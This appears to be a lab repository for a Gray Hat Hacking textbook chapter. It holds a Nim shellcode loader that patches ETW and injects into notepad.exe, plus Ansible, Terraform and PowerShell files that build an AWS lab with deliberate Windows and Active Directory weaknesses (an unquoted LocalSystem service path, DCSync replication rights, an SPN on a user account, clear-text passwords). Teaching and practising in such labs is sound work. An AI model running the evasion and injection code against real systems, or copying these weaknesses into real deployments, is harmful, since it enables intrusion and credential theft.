  ## Overwrites the first byte of ntdll!EtwEventWrite in the *current* process
  ## with `patch` (0xC3, RET) so ETW event writes from this process return
  ## immediately. Returns true only when the symbol was resolved and the first
  ## VirtualProtect succeeded.
  ##
  ## Defender notes: in-memory only; an integrity comparison of the
  ## EtwEventWrite prologue with the on-disk ntdll image exposes it, as does the
  ## transient PAGE_EXECUTE_READ_WRITE change on an ntdll code page.
  var
    ntdll: LibHandle
    etwPointer: pointer    # resolved address of EtwEventWrite
    origProtect: DWORD     # original protection, restored after the copy
    trash: DWORD           # receives the protection from the restore call; unused
    disabled: bool = false

  ntdll = loadLib("ntdll")
  if isNil(ntdll):
    echo "[X] Failed to load ntdll.dll"
    return disabled

  etwPointer = ntdll.symAddr("EtwEventWrite")
  if isNil(etwPointer):
    echo "[X] Failed to get the address of 'EtwEventWrite'"
    return disabled

  if VirtualProtect(etwPointer, patch.len, PAGE_EXECUTE_READ_WRITE, addr origProtect):
    echo "[*] Applying patch"
    copyMem(etwPointer, unsafeAddr patch, patch.len)
    # NOTE(review): the restoring call's result is not checked; a failure here
    # leaves the page RWX while `disabled` still reports success.
    VirtualProtect(etwPointer, patch.len, origProtect, addr trash)
    disabled = true

  return disabled
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
  ## Starts notepad.exe suspended, copies `shellcode` into a new RWX region of
  ## that process and starts a remote thread at it. Prints progress only.
  ## `shellcode` is spliced in at the INJECTHERE placeholder at build time.
  ##
  ## Defender notes: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
  ## WriteProcessMemory -> CreateRemoteThread into a just-spawned notepad.exe is
  ## the sequence Sysmon records as Event ID 10 (ProcessAccess) followed by
  ## Event ID 8 (CreateRemoteThread).
  # startProcess creates a process using the osproc module
  let tProcess = startProcess("notepad.exe")
  # suspends the process. The defer means if any of the below fails
  # then close the process out
  # NOTE(review): close() releases handles; nothing here resumes or terminates
  # the suspended notepad.exe — confirm whether it is meant to linger.
  tProcess.suspend()
  defer: tProcess.close()
  echo "[*] Target Process: ", tProcess.processID
  # opens the process with all access, allowing us to inject threads
  let pHandle = OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](tProcess.processID)
  )
  defer: CloseHandle(pHandle)
  echo "[*] pHandle: ", pHandle
  # Create shellcode memory. Shellcode is RWX until we are done copying
  # NOTE(review): rPtr is not checked for NULL before it is used below.
  let rPtr = VirtualAllocEx(
    pHandle,
    NULL,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE
  )
  # copy the shellcode into memory
  var bytesWritten: SIZE_T
  let wSuccess = WriteProcessMemory(
    pHandle,
    rPtr,
    unsafeAddr shellcode,
    cast[SIZE_T](shellcode.len),
    addr bytesWritten
  )
  var origProtect: DWORD
  # NOTE(review): VirtualProtect changes protections in the *calling* process,
  # but rPtr belongs to the remote notepad.exe, so this call does not alter the
  # remote region (and its return value is unchecked). The remote page therefore
  # stays PAGE_EXECUTE_READ_WRITE, which is what private-RWX memory scans flag —
  # the comment above describes an intent the code does not implement.
  VirtualProtect(
    rPtr,
    cast[SIZE_T](shellcode.len),
    PAGE_EXECUTE_READ,
    addr origProtect
  )
  # NOTE(review): wSuccess is only echoed; a failed write still proceeds to
  # CreateRemoteThread.
  echo "[*] WriteProcessMemory: ", bool(wSuccess)
  echo " \\-- bytes written: ", bytesWritten
  echo ""
  let tHandle = CreateRemoteThread(
    pHandle,
    NULL,
    0,
    cast[LPTHREAD_START_ROUTINE](rPtr),
    NULL,
    0,
    NULL
  )
  defer: CloseHandle(tHandle)
  echo "[*] tHandle: ", tHandle
  echo "[+] Injected"
INJECTHERE
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
  # Patch ETW in this process first, then inject into notepad.exe. `shellcode`
  # comes from the INJECTHERE substitution above; the raw template does not
  # compile until it has been filled in.
  var success = Patchntdll()
  echo fmt"[*] ETW blocked by patch: {bool(success)}"
  injectCreateRemoteThread(shellcode)
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/tasks/main.yml
================================================
---
- name: Make python3 default
alternatives:
name: python
path: /usr/bin/python3
link: /usr/bin/python
priority: 10
- name : disable apache2 startup
systemd:
enabled: no
name: apache2
state: stopped
- name : disable smbdstartup
systemd:
enabled: no
name: smbd
state: stopped
- name: checkout Offensive Nim
git:
repo: https://github.com/byt3bl33d3r/OffensiveNim.git
dest: /home/kali/OffensiveNim
- name: checkout https://github.com/Ne0nd0g/go-shellcode
git:
repo: https://github.com/Ne0nd0g/go-shellcode.git
dest: /home/kali/go-shellcode
- name: Download Microsoft Package Pieces
get_url:
url: https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb
dest: /tmp/packages-microsoft-prod.deb
- name: Install Microsoft package
apt:
deb: /tmp/packages-microsoft-prod.deb
- name: Fix repo list
shell: echo "" > /etc/apt/sources.list
- name: Install .Net 3.1 and Covenant
apt:
update_cache: yes
pkg:
- dotnet-sdk-3.1
- mingw-w64
- nim
- covenant-kbx
- golang
state: latest
retries: 5
delay: 10
- name: install evil-winrm gem
gem:
name: evil-winrm
user_install: no
version: 2.4
- name: Copy code
copy:
src: ../files/shells
dest: /home/kali
- name: Copy covenant patch
copy:
src: ../files/covenant.patch
dest: /tmp/covenant.patch
- name: Copy share helper
copy:
src: ../files/addshare.txt
dest: /home/kali/addshare.txt
- name: patch covenant
shell: cd / && patch -p1 < tmp/covenant.patch
- name: fix file ownership
file:
path: /home/kali
owner: kali
recurse: yes
================================================
FILE: ch07/Lab/ansible/roles/target_customizations/tasks/main.yml
================================================
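---
# Target host setup for the chapter lab. Several tasks configure weaknesses on
# purpose (they are the exercise material); they are called out where they
# appear so the role is not mistaken for a hardening baseline.

- name: Update Local Security Policy to allow users to run scheduled tasks
  win_user_right:
    name: SeBatchLogonRight
    users:
      - GHH\target
    action: add

# The two "ping" tasks below run as GHH\target every minute and list a UNC
# path on 10.0.0.40 (the Kali host) and on 10.0.0.30, i.e. they produce a
# recurring SMB authentication from that account towards those hosts (the task
# names refer to the Responder/Inveigh listeners). 10.0.0.30 is not provisioned
# by the visible Terraform; presumably the second listener host.
- name: Add scheduled task for Kali access
  win_scheduled_task:
    name: ResponderPing
    enabled: yes
    hidden: no
    actions:
      - path: powershell.exe
        arguments: -exec bypass -win hidden -nopro -command "Get-ChildItem //10.0.0.40/qq"
    triggers:
      - type: registration
        repetition:
          interval: PT1M
    username: "GHH\\target"
    # Lab credential; the same value is listed in vars/users.yml and the README.
    password: "Winter2021!"
    logon_type: password
    update_password: yes

- name: Add scheduled task for inveigh
  win_scheduled_task:
    name: InveighPing
    enabled: yes
    hidden: no
    actions:
      - path: powershell.exe
        arguments: -exec bypass -win hidden -nopro -command "Get-ChildItem //10.0.0.30/qq"
    triggers:
      - type: registration
        repetition:
          interval: PT1M
    username: "GHH\\target"
    password: "Winter2021!"
    logon_type: password
    update_password: yes

- name: Add target to Remote desktop users
  win_group_membership:
    name: "Remote Desktop users"
    state: present
    members:
      - GHH\target

- name: Add target to Remote managmenters
  win_group_membership:
    name: "Remote Management Users"
    state: present
    members:
      - GHH\target

- name: Create directory for vulnerable service
  win_file:
    path: "C:\\Software\\Vulnerable Software\\Updater"
    state: directory

# snmptrap.exe is reused as the service binary so the service can actually
# start; the binary itself is not what is vulnerable.
- name: Create vulnerable service by copying legitimate service bunary
  win_copy:
    remote_src: yes
    src: "C:\\Windows\\System32\\snmptrap.exe"
    dest: "C:\\Software\\Vulnerable Software\\Updater\\vulnagent.exe"

# NOTE(review): state: absent *removes* an explicit FullControl/Modify allow
# entry for Users on this folder rather than granting one, so whatever write
# access Users end up with comes from inherited ACLs. Confirm this is the
# permission state the exercise expects.
- name: Update folder ACLs
  win_acl:
    user: BUILTIN\Users
    path: "C:\\Software\\Vulnerable Software\\"
    rights: FullControl, Modify
    type: allow
    state: absent

- name: Update folder ACLs
  win_acl:
    user: Users
    path: "C:\\Software\\Vulnerable Software\\"
    rights: FullControl, Modify
    type: allow
    state: absent

# Deliberate weakness: the binary path contains spaces and is registered
# unquoted, and the service runs as LocalSystem.
- name: Create vulnerable service
  win_service:
    name: Vulnerable Software
    description: Vulnerable Software Ltd
    username: LocalSystem
    path: "C:\\Software\\Vulnerable Software\\Updater\\vulnagent.exe"

# The SDDL grants Authenticated Users (AU) RP and WP on the service, i.e. the
# right to start and stop it, in addition to the usual query rights.
- name: Allow target to restart service
  win_shell: sc.exe sdset "vulnerable software" "D:(A;;RPWPLOCCLCDT;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

# The option was spelled "compatability", which win_scheduled_task does not
# accept; the key is "compatibility" (4 = Windows 10 task format).
- name: Create task for inventory updates
  win_scheduled_task:
    name: UpdateInventory
    description: Update inventory data
    username: SYSTEM
    hidden: no
    enabled: yes
    compatibility: 4
    actions:
      # NOTE(review): nothing in this role creates update.exe; presumably the
      # SYSTEM task pointing at a missing binary is part of the exercise.
      - path: C:\Software\InventoryMgmt\update.exe
    triggers:
      - type: time
        start_boundary: '2017-10-09T09:00:00'
        repetition:
          interval: PT5M
    state: present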
================================================
FILE: ch07/Lab/ansible/roles/windows_client_join_domain/tasks/main.yml
================================================
---
- name: Gather facts from new server
setup:
filter: ansible_default_ipv4.address
- name: setup DNS properly
win_dns_client:
ipv4_addresses: 10.0.0.10
- name: join domain
win_domain_membership:
dns_domain_name: "{{ windows_domain_controller_info['dns_domain_name'] }}"
domain_admin_user: "{{ windows_domain_controller_info['domain_admin_user'] }}"
domain_admin_password: "{{ windows_domain_controller_info['domain_admin_password'] }}"
hostname: ws20
state: domain
register: domain_state
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 3600
shutdown_timeout_sec: 3600
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/defaults/main.yml
================================================
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/handlers/main.yml
================================================
- name: restart machine
win_reboot:
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/tasks/features.yml
================================================
---
- name: features | Installing Windows DNS Server
win_feature:
name: DNS
state: present
include_management_tools: yes
include_sub_features: yes
register: _windows_dns_server
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/tasks/main.yaml
================================================
- include: features.yml
- include: reboot.yml
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/tasks/reboot.yml
================================================
---
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 3600
when: >
_windows_dns_server['restart_needed'] is defined and
_windows_dns_server['restart_needed']
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/defaults/main.yml
================================================
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/handlers/main.yml
================================================
- name: restart machine
win_reboot:
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/tasks/create.yml
================================================
---
# tasks file for ansible-windows-domain-controller
#
- name: set local admin password
win_user:
name: Administrator
password: "{{ windows_domain_controller_info['domain_admin_password'] }}"
state: present
- name: features | Installing RSAT AD Admin Center
win_feature:
name: RSAT-AD-AdminCenter
state: present
- name: features | Installing AD Domain Services
win_feature:
name: AD-Domain-Services
include_management_tools: yes
include_sub_features: yes
state: present
- name: Creating a windows domain
win_domain:
dns_domain_name: "{{ windows_domain_controller_info['dns_domain_name'] }}"
safe_mode_password: "{{ windows_domain_controller_info['safe_mode_password'] }}"
- name: Setting DNS Servers
win_dns_client:
adapter_names: "*"
ipv4_addresses: "127.0.0.1"
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 300
shutdown_timeout: 300
- name: Managing Domain Controller Membership
win_domain_controller:
dns_domain_name: "{{ windows_domain_controller_info['dns_domain_name'] }}"
domain_admin_user: "{{ windows_domain_controller_info['domain_admin_user'] }}"
domain_admin_password: "{{ windows_domain_controller_info['domain_admin_password'] }}"
safe_mode_password: "{{ windows_domain_controller_info['safe_mode_password'] }}"
state: "{{ windows_domain_controller_info['state'] }}"
register: _windows_domain_controller
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/tasks/main.yaml
================================================
- include: create.yml
- include: reboot.yml
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/tasks/reboot.yml
================================================
---
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 3600
shutdown_timeout_sec: 3600
when: >
_windows_domain_controller['reboot_required'] is defined and
_windows_domain_controller['reboot_required']
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_users_groups/files/usermods.ps1
================================================
# Lab provisioning for the domain: creates a "CloudSync Users" group holding
# directory-replication rights on the domain root, a PasswordAdmin user with
# delegated rights over the "Administrative Groups" OU, and an SPN on that
# user. These are the deliberate misconfigurations the chapter exercises use;
# they are also exactly what AD ACL auditing and DCSync-style detections flag.
Import-Module ActiveDirectory
#Bring up an Active Directory command prompt so we can use this later on in the script
#Get a reference to the RootDSE of the current domain
$rootdse = Get-ADRootDSE
#Get a reference to the current domain
$domain = Get-ADDomain
cd AD:\
#Create a hashtable to store the GUID value of each schema class and attribute
$guidmap = @{}
Get-ADObject -SearchBase ($rootdse.SchemaNamingContext) -LDAPFilter `
"(schemaidguid=*)" -Properties lDAPDisplayName,schemaIDGUID |
% {$guidmap[$_.lDAPDisplayName]=[System.GUID]$_.schemaIDGUID}
#Create a hashtable to store the GUID value of each extended right in the forest
$extendedrightsmap = @{}
Get-ADObject -SearchBase ($rootdse.ConfigurationNamingContext) -LDAPFilter `
"(&(objectclass=controlAccessRight)(rightsguid=*))" -Properties displayName,rightsGuid |
% {$extendedrightsmap[$_.displayName]=[System.GUID]$_.rightsGuid}
#Create a new OU called Administrative Groups and make a group in it
New-ADOrganizationalUnit -Name "Administrative Groups"
New-ADGroup "CloudSync Users" -Path "OU=Administrative Groups,DC=ghh,DC=local" -GroupScope Global -GroupCategory Security
#Get sid and acl of the root OU
$sid = New-Object System.Security.Principal.SecurityIdentifier(Get-ADGroup "CloudSync Users").SID
$acl = Get-ACL $domain.distinguishedname
#Add Replicate changes all to root DN for CloudSync Users group
# The three extended rights granted on the domain head are, by GUID:
#   1131f6aa-9c07-11d1-f79f-00c04fc2dcd2  DS-Replication-Get-Changes
#   1131f6ad-9c07-11d1-f79f-00c04fc2dcd2  DS-Replication-Get-Changes-All
#   89e95b76-444d-4c62-991a-0facbeda640c  DS-Replication-Get-Changes-In-Filtered-Set
# Together they let members of the group replicate directory data, including
# secrets, like a domain controller would.
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"ExtendedRight","Allow",'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',"None","00000000-0000-0000-0000-000000000000"))
Set-Acl -Path $domain.distinguishedname -AclObject $acl
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"ExtendedRight","Allow",'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',"None","00000000-0000-0000-0000-000000000000"))
Set-Acl -Path $domain.distinguishedname -AclObject $acl
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"ExtendedRight","Allow",'89e95b76-444d-4c62-991a-0facbeda640c',"None","00000000-0000-0000-0000-000000000000"))
Set-Acl -Path $domain.distinguishedname -AclObject $acl
#Get the ACL for Administrative Groups
$acl = Get-ACL "OU=Administrative Groups,DC=ghh,DC=local"
#Make a Password Admin user
# Lab credential stored in clear text in this script.
new-ADuser PasswordAdmin -enabled $true -Description "Password Reset Admin" -AccountPassword (ConvertTo-SecureString "Passw+ord127" -AsPlaintext -Force )
#Set that user so that they can manage membership and passwords of groups in that OU
# bf9679c0-0de6-11d0-a285-00aa003049e2 is the "member" attribute, granted as
# WriteProperty on descendant group objects (i.e. PasswordAdmin can change
# membership of groups in this OU, including "CloudSync Users").
$sid = New-Object System.Security.Principal.SecurityIdentifier(Get-ADUser PasswordAdmin).SID
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"WriteProperty","Allow", "bf9679c0-0de6-11d0-a285-00aa003049e2","Descendents",$guidmap["group"]))
# NOTE(review): 00299570-246d-11d0-a768-00aa006e0529 is the User-Force-Change-Password
# control access right, but it is added here as WriteProperty rather than
# ExtendedRight — confirm the ACE takes effect as a password-reset grant.
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"WriteProperty","Allow", "00299570-246d-11d0-a768-00aa006e0529","Descendents",$guidmap["user"]))
Set-Acl -Path "OU=Administrative Groups,DC=ghh,DC=local" -AclObject $acl
New-ADComputer -Enabled $true -Name Password
# Registers the SPN www/Password on the PasswordAdmin *user* account, which
# makes a service ticket for that user obtainable by any domain principal;
# user accounts with SPNs are a standard finding in AD audits.
setspn -s www/Password PasswordAdmin
# PasswordAdmin inherits the replication rights granted above through this membership.
Add-ADGroupMember -Identity "CloudSync Users" -members "PasswordAdmin"
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_users_groups/tasks/main.yml
================================================
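---
# Lab only: the domain password policy is relaxed so the short test passwords
# from vars/users.yml are accepted (complexity off, minimum length 3, no
# expiry).
- name: Disable domain password complexity
  win_shell: 'Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser | Set-ADDefaultDomainPasswordPolicy -ComplexityEnabled $false -MinPasswordAge 0 -MaxPasswordAge 0 -MinPasswordLength 3'

# Creates each user from domain_users disabled, sets its password, then enables
# it (the ordering is why there are three tasks for one user).
- name: Add Windows Users
  win_domain_user:
    name: "{{ item.name }}"
    # The key was misspelled "passsword", so the module never received the
    # password; that is what the "workaround" task below was compensating for.
    password: "{{ item.password }}"
    groups: "{{ item.groups }}"
    password_never_expires: true
    state: present
    enabled: no
    # NOTE(review): account_disabled is not a win_domain_user option as far as
    # I can tell; a module with strict argument checking will reject it.
    account_disabled: no
  with_items:
    - "{{ domain_users }}"

# Kept as a belt-and-braces step: with the password key fixed above this should
# be a no-op, and it still sets the password if the module silently ignored it.
- name: Set Password (workaround because not working)
  win_shell: '$pw = "{{ item.password}}" | ConvertTo-SecureString -AsPlainText -Force; Set-ADAccountPassword -Identity {{ item.name }} -NewPassword $pw'
  with_items:
    - "{{ domain_users }}"

- name: Enable windows users
  win_domain_user:
    name: "{{ item.name }}"
    state: present
    enabled: yes
  with_items:
    - "{{ domain_users }}"

- name: chocolatey install 7zip
  win_chocolatey:
    name: 7zip
    state: latest

- name: chocolatey install git
  win_chocolatey:
    name: git
    state: latest

- name: create temp dir
  win_file:
    path: c:\temp
    state: directory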
================================================
FILE: ch07/Lab/ansible/roles/windows_local_group_membership/tasks/main.yml
================================================
---
- name: add users to local groups for remote login
win_group_membership:
name: "Remote Desktop Users"
state: present
members:
- GHH\target
================================================
FILE: ch07/Lab/ansible/vars/users.yml
================================================
---
#domain_users:
#- { name : "target", password : "Winter2021" , groups : "" }
#- { name : "ghhadmin" , password : "GrayHat6" , groups : "Domain Admins" }
domain_users:
- name : "target"
password : "Winter2021!"
groups : "Domain Users"
- name : "ghhadmin"
password : "GrayHat6!"
groups : "Domain Admins"
================================================
FILE: ch07/Lab/ansible/vars/vars.yml
================================================
windows_domain_controller_info:
dns_domain_name: ghh.local
domain_admin_password: GrayHatHack1ng!
domain_admin_user: Administrator@ghh.local
safe_mode_password: GrayHatHack1ng!
state: domain_controller
ip: 10.0.0.10
================================================
FILE: ch07/Lab/build.sh
================================================
#!/bin/bash
cd terraform
terraform init && terraform validate && terraform apply
cd ../ansible
ansible-playbook -i inventory ch07_playbook.yml
================================================
FILE: ch07/Lab/destroy.sh
================================================
#!/bin/bash
cd terraform
terraform destroy
================================================
FILE: ch07/Lab/terraform/aws_data.tf
================================================
data "aws_availability_zones" "this" {
state = "available"
}
data "aws_ami" "ghh-kali" {
most_recent = true
filter {
name = "name"
values = ["ghh-kali-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
owners = ["self"]
}
data "aws_ami" "ghh-2019" {
most_recent = true
filter {
name = "name"
values = ["ghh-server2019-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
owners = ["self"]
}
data "aws_ami" "ghh-2016" {
most_recent = true
filter {
name = "name"
values = ["ghh-server2016-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
owners = ["self"]
}
================================================
FILE: ch07/Lab/terraform/aws_hosts.tf
================================================
locals {
  # PowerShell user-data that sets the local Administrator password at first
  # boot; the same block is reused for the DC and the target instance.
  # EC2 user-data is readable from inside the instance through the instance
  # metadata service without any credentials, so the Administrator password
  # embedded here is recoverable by any local process on those hosts.
  dc-userdata = <<EOF
<powershell>
$admin = [adsi]("WinNT://./administrator, user")
$admin.psbase.invoke("SetPassword", "${var.dc_password}")
</powershell>
EOF
}
resource "aws_instance" "kali" {
ami = data.aws_ami.ghh-kali.id
instance_type = "t2.large"
key_name = var.key_name
subnet_id = aws_subnet.this.id
vpc_security_group_ids = [aws_security_group.allow-ssh.id]
associate_public_ip_address = true
private_ip = "10.0.0.40"
root_block_device {
volume_size = 200
}
tags = {
Name = "ghh-kali"
}
}
resource "aws_instance" "ghh_dc" {
ami = data.aws_ami.ghh-2019.id
instance_type = "t2.large"
key_name = var.key_name
subnet_id = aws_subnet.this.id
private_ip = "10.0.0.10"
user_data_base64 = base64encode(local.dc-userdata)
vpc_security_group_ids = [aws_security_group.ghh_windows.id]
associate_public_ip_address = true
get_password_data = "true"
root_block_device {
volume_size = 200
}
tags = {
Name = "ghh-dc"
}
}
resource "aws_instance" "ghh_target" {
ami = data.aws_ami.ghh-2016.id
instance_type = "t2.large"
key_name = var.key_name
subnet_id = aws_subnet.this.id
private_ip = "10.0.0.20"
user_data_base64 = base64encode(local.dc-userdata)
vpc_security_group_ids = [aws_security_group.ghh_windows.id]
associate_public_ip_address = true
get_password_data = "true"
root_block_device {
volume_size = 200
}
tags = {
Name = "ghh-target"
}
}
================================================
FILE: ch07/Lab/terraform/inventory.tmpl
================================================
${cat}:
hosts:
%{for addr in ip_addrs ~}
${addr}:
%{endfor ~}
vars:
%{for var in vars ~}
${var}
%{endfor ~}
================================================
FILE: ch07/Lab/terraform/main.tf
================================================
provider "aws" {
shared_credentials_file = var.shared_credentials_file
region = "us-east-1"
profile = "ghh"
}
================================================
FILE: ch07/Lab/terraform/outputs.tf
================================================
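# Decrypted local Administrator password of the DC instance. Marked sensitive
# so `terraform apply` does not echo it to the console or CI log; read it with
# `terraform output -raw dc_password`. It is still stored in clear text in the
# state file.
output "dc_password" {
  value     = rsadecrypt(aws_instance.ghh_dc.password_data, file(var.key_path))
  sensitive = true
}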
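# Decrypted local Administrator password of the target instance. Marked
# sensitive so it is not printed on `terraform apply`; read it with
# `terraform output -raw target_password`. It remains in clear text in state.
output "target_password" {
  value     = rsadecrypt(aws_instance.ghh_target.password_data, file(var.key_path))
  sensitive = true
}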
output "dc_ip" { value = try(aws_instance.ghh_dc.public_ip,null) }
output "target_ip" { value = try(aws_instance.ghh_target.public_ip,null) }
output "kali_ip" { value = try(aws_instance.kali.public_ip,null) }
# Renders ../ansible/inventory/dc.yml from inventory.tmpl. The vars configure
# Ansible to reach the DC over WinRM on plain HTTP (port 5985) with basic auth
# against the instance's public IP, so the Administrator password crosses the
# internet in clear text on every task, and the rendered inventory file holds
# it in plain text on disk. The same settings are used for target_inv below.
# Port 5985 is opened to var.ip_allowlist by the ghh_windows security group.
resource "local_file" "dc_inv" {
  content = templatefile("./inventory.tmpl",
    {
      cat      = "dc",
      ip_addrs = [aws_instance.ghh_dc.public_ip]
      vars = ["ansible_connection: winrm",
        "ansible_user: Administrator",
        "ansible_winrm_scheme: http",
        "ansible_winrm_transport: basic",
        "ansible_winrm_server_cert_validation: ignore",
        "ansible_winrm_port: 5985",
        "ansible_password: ${var.dc_password}"
      ]
    }
  )
  filename = "../ansible/inventory/dc.yml"
}
resource "local_file" "target_inv" {
content = templatefile("./inventory.tmpl",
{
cat = "target",
ip_addrs = [aws_instance.ghh_target.public_ip]
vars = ["ansible_connection: winrm",
"ansible_user: Administrator",
"ansible_winrm_scheme: http",
"ansible_winrm_transport: basic",
"ansible_winrm_server_cert_validation: ignore",
"ansible_winrm_port: 5985",
"ansible_password: ${var.dc_password}"
]
}
)
filename = "../ansible/inventory/target.yml"
}
resource "local_file" "kali_inv" {
content = templatefile("./inventory.tmpl",
{
cat = "kali",
ip_addrs = [aws_instance.kali.public_ip]
vars = [
"ansible_user: kali",
"ansible_python_interpreter: /usr/bin/python3"
]
}
)
filename = "../ansible/inventory/kali.yml"
}
================================================
FILE: ch07/Lab/terraform/terraform.tfvars-orig
================================================
key_path="<path to your SSH KEY>"
================================================
FILE: ch07/Lab/terraform/variables.tf
================================================
variable "aws_region" {
default = "us-east-1"
}
variable "aws_profile" {
default = "ghh"
}
variable "dc_password" {
default = "GrayHatHack1ng!"
}
variable "shared_credentials_file" {
description = "Path to your AWS credentials file"
type = string
default = "/home/username/.aws/credentials"
}
variable "key_path" {
description = "Key path for SSHing into EC2"
default = "~/.ssh/id_rsa.pem"
}
variable "key_name" {
description = "Key name for SSHing into EC2"
default = "ghh"
}
variable "ip_allowlist" {
description = "A list of CIDRs that will be allowed to access the EC2 instances"
type = list(string)
default = ["0.0.0.0/0"]
}
================================================
FILE: ch07/Lab/terraform/versions.tf
================================================
================================================
FILE: ch07/Lab/terraform/vpc.tf
================================================
resource "aws_vpc" "this" {
cidr_block = "10.0.0.0/16"
enable_dns_hostnames = true
enable_dns_support = true
lifecycle {
create_before_destroy = true
}
}
resource "aws_internet_gateway" "this" {
vpc_id = aws_vpc.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_eip" "nat" {
vpc = true
}
resource "aws_nat_gateway" "nat" {
allocation_id = aws_eip.nat.id
subnet_id = aws_subnet.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_subnet" "this" {
cidr_block = "10.0.0.0/16"
map_public_ip_on_launch = true
vpc_id = aws_vpc.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_route_table" "this" {
vpc_id = aws_vpc.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_route" "this" {
route_table_id = aws_route_table.this.id
destination_cidr_block = "0.0.0.0/0"
gateway_id = aws_internet_gateway.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_route_table_association" "this" {
route_table_id = aws_route_table.this.id
subnet_id = aws_subnet.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_security_group" "allow-ssh" {
vpc_id = aws_vpc.this.id
name = "allow-ssh"
description = "security group that allows ssh and all egress traffic"
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/16"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["224.0.0.0/24"]
}
ingress {
from_port = 22
to_port = 22
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
ingress {
from_port = 8675
to_port = 8675
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
ingress {
from_port = 7443
to_port = 7443
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
tags = {
Name = "allow-ssh"
}
}
resource "aws_security_group" "ghh_windows" {
vpc_id = aws_vpc.this.id
name = "ghh_windows"
description = "security group that allows windows ports"
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/16"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["224.0.0.0/24"]
}
ingress {
from_port = 3389
to_port = 3389
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
ingress {
from_port = 5985
to_port = 5986
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
tags = {
Name = "ghh-rules"
}
}
================================================
FILE: ch07/README.md
================================================
# Gray Hat Hacking v6 Chapter 07
This directory contains all the components necessary for Chapter 07.
## Lab Information
The following VMs will be setup for this lab:
- Domain Controller
- IP: 10.0.0.10
- Domain Admin: ghhadmin
- DA Password: GrayHat6!
- Target Computer
- IP: 10.0.0.20
- Target User: target
- Target Password: Winter2021!
- Kali Computer
- IP: 10.0.0.40
- User: kali
- Pass: SSH key setup with the lab
## Setting up the Lab
1. Make sure you have completed all the steps at (https://github.com/GrayHatHacking/GHHv6/tree/main/CloudSetup).
1. Go into the Lab/terraform directory and copy the `terraform.tfvars-orig` to `terraform.tfvars`. Edit the file with your
favorite editor and then replace the contents of the key_path variable with the path to your SSH key. An example
might look like:
`key_path="/home/kali/.ssh/id_rsa"`
1. Go into the Lab subdirectory and run `build.sh` to start the environment build. It will ask whether you are sure you want to create resources;
when it does, type in `yes`.
1. This will create resources that may cost you money. If you want to destroy the lab between uses,
run `destroy.sh`. Answer `yes` when it asks if you are sure, and the resources will be deleted.
## Retrieving the IP addresses of the machines
Once the build.sh script is completed, it should print the IP addresses of the hosts
out to the screen. If you forget these IP addresses, you can go into the terraform directory
in the lab and run `terraform show`; it will show you the status of your
lab as well as the IP addresses of the relevant boxes.
## What does each machine do?
### Domain Controller
This system is the domain controller for our lab. The target VM is a member of
a domain in order to make the scenario more realistic. This system is critical so it
should not be shut down
### Target system
This is the system you will be attacking during the lab. It should be the only system besides
the Kali box that you would need to interact with in the lab environment unless you
do additional work on your own.
### Kali box
This is the Kali attack system that will be used in the lab.
## Notes
By default this lab allows ANYONE who knows the credentials to connect to it. For new users
